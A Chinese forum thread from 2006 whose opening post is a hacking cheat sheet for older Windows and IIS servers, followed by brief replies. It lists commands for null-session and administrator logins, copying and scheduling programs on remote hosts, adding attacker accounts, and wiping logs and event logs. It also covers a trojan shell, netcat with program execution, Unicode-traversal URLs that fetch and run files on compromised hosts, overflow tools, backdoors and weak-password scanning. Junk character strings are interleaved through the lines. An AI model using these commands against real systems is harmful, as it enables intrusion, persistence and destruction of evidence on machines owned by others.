社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3525阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 ~ei\~;n\@  
常用的几条NET命令: \M>+6m@w  
t?^C9(;6  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" Fy-+? ~  
dbGW`_zQ4  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" Mf0g)X}1  
t5h]]TOz  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ mLM$dk3  
2-821Sf#h  
(查看远程主机时间) net time \\IP地址 620y[iiK$  
jqHg'Fq  
(定时启动某个程序) at \\IP地址 02:18 readme.exe Vm]ltiTVk  
tBe)#-O  
(查看共享) net view \\IP地址 Xz5 aTJ&  
v#0R   
(查看netbios工作组列表) nbtstat -A IP地址 DB'pRo+U  
b?h9G3J_a  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" m`UNdFS  
.)^@[yrkz  
(这两条把自己增加到管理员组): net user 用户名 密码 /add !Y_"q^5GG'  
b7>^w<ki  
net localgroup Administrators 用户名 /add Q[i/]  
HBYqqEO  
(断开连接) net use \\IP地址\ipc$ /delete X ^>o/U  
yEt:g0Z \  
扫尾: <by}/lF0  
 G~T]m .  
del C:\winnt\system32\logfiles\*.* O4FW/)gq  
}NPF]P;  
del C:\winnt\ssytem32\config\*.evt QZk:G+ $  
vrXmzq  
del C:\winnt\system32\dtclog\*.* +]Of f^s  
U:>'^tkp  
del C:\winnt\system32\*.log j[YzBXd V  
NLM ]KT  
del C:\winnt\system32\*.txt B+|E|8"  
NtMK+y  
del C:\winnt\*.txt J=>?D@K  
(5?5? <  
del C:\winnt\*.log /h%<e  
O!='U!X@P  
一、netsvc.exe DHGv< F@  
hNUAwTH6  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: i](,s.  
hb9X<N+p  
netsvc /list \\IP地址 ~u1ox_v`%(  
IjN3 jU  
netsvc schedule \\IP地址 /query Rk^Fasg"  
*w4jET>  
netsvc \\IP地址 schedule /start X"b4U\A  
PEZElB ;  
二、OpenTelnet.exe ~6@zXHAS  
Mw7!w-1+  
远程启动主机的Telnet服务,并绑定端口到7878,例如: 6cSMKbgZJ  
gs 8w/  
OpenTelnet \\IP地址 用户名 密码 1 7878 ws tI8">  
hC<X\yxe  
然后就可以telnet到主机的7878端口,进入DOS方式下: ?UQVmE&  
3tI=? E#  
telnet IP地址 7878 N+l~r]: &  
C.s{ &  
三、winshell.exe y4) M,+O5  
9}`O*A=KC  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: mp0p#8txi  
/7*jH2  
p Path (查看winshell主程序的路径信息) nWN~G  
GmtMA|  
b reBoot (重新启动机器) sF]v$ kq  
@8Drhx  
d shutDown (关闭机器) !^!<Xz;  
rB?u.jn0T  
s Shell (执行后你就会看到可爱的“C:\>”) Vj4 if@Z  
F/ 2@%,2n  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) 4 C[,S|J  
;|w &n  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) Nv*x^y]  
rfYu8-  
四、3389登陆器,GUI方式登录远程主机的 r\vB-nJ  
EG&^;uU  
五、elsave.exe =nFT0];  
(U2G"  
事件日志清除工具 M ^ ZoBsZ  
aRq7x~j )\  
elsave -s \\IP地址 -l "application" -C 51.F,uY  
b@^M|h.Va  
elsave -s \\IP地址 -l "system" -C /`hr)  
vQ+}rHf`[  
elsave -s \\IP地址 -l "security" -C  g}Hk4+  
)&+_T+\  
执行后成功清除应用程序日志,系统日志,安全日志 \q Q5x  
\bQ|O7s  
六、hbulot.exe IG`~^-}7lR  
#i ?@S$  
开启win2kserver和winxp的3389服务 (&PamsV*8  
POH >!lHu  
hbulot [/r] vbqI$F[s  
x~s>  
使用/r表示安装完成后自动重起目标使设置生效。 z:u`W#Rf  
=d~]*[8  
七、nc.exe(netcat.exe) $DA0lY\  
eno*JK  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 L)8+/+  
aZ@4Z=LK  
想要连接到某处: nc [-options] hostname port[s] [ports] ... -/x +M-X#  
}S*6+4  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] )FWF T:P~  
*^Zt5 zk  
参数: /T#<g:   
*Q!b%DIa$  
-e prog 程序重定向,一旦连接,就执行 [危险!!] :N8D1e-a  
]~WP;o  
-g gateway source-routing hop point[s], up to 8 Da-F(^E  
&@dMk4BH<  
-G num source-routing pointer: 4, 8, 12, ... sB0+21'R  
Lom%eoH)  
-h 帮助信息 rO]C`bg  
/lr RbZ  
-i secs 延时的间隔 $k'f)E  
V.y+u7<3}  
-l 监听模式,用于入站连接 V]q{N-Iq  
0p2 0Rt  
-n 指定数字的IP地址,不能用hostname Ub3,x~V  
`yQHPN0/  
-o file 记录16进制的传输 Hkg@M?(  
bx6@FKns}  
-p port 本地端口号 I,YGm  
* D AgcB  
-r 任意指定本地及远程端口 L+I[yJY:!  
^iV@NVP  
-s addr 本地源地址 xR_]^Get  
'Fonn  
-u UDP模式 gKYn*  
#jZ:Ex  
-v 详细输出——用两个-v可得到更详细的内容 vnN_csJ#^  
#m$H'O[WG\  
-w secs timeout的时间 G!rcY5!J  
,7j`5iq[m  
-z 将输入输出关掉——用于扫描时 +vU.#C_2  
八、TFTPD32.EXE 8U;!1!+ 7)  
@W. `'b-  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: iGhapD  
wSAm[.1i  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 Ey6K@@%  
Q'8v!/"}p{  
然后可以直接令文件运行: xDQ$Ui.  
wz, \zh  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 ko5\*!|:lj  
EXBfzK)a  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 D>|:f-Z6Z  
Fe=4^.  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 PN'8"8`{  
78.sf{I  
一、一 Xscan命令行运行参数说明: 'P~*cr ?A  
.1pEq~>  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 t&&OhHK  
hV,3xrm?P  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] |SxEJ  
5G!X4%a  
xscan -file <主机列表文件名> <检测项目> [其他选项] t{ 7l.>kf  
l,X;<&-[  
其中<检测项目> 含义如下: Gg!))I+  
%b*%'#iK  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); xv*mK1e  
-0]aOT--  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); gSGe]  
/F4:1 }  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); ko:I.6-K  
2tbqmWw/s  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); :D,YR(])  
(]V.#JM  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); ;+jp,( 7  
Q?tV:jogY  
[其他选项] 含义如下: OM.^>=  
[_0g^(`  
-v: 显示详细扫描进度 [yyV`&  
N0piL6Js  
-p: 跳过Ping不通的主机 5^Y/RS i  
MCCZh{uo  
-o: 跳过没有检测到开放端口的主机 J)G3Kq5>:b  
9s!/yiP5  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 W,~1KUTc  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
10+5=?,请输入中文答案:十五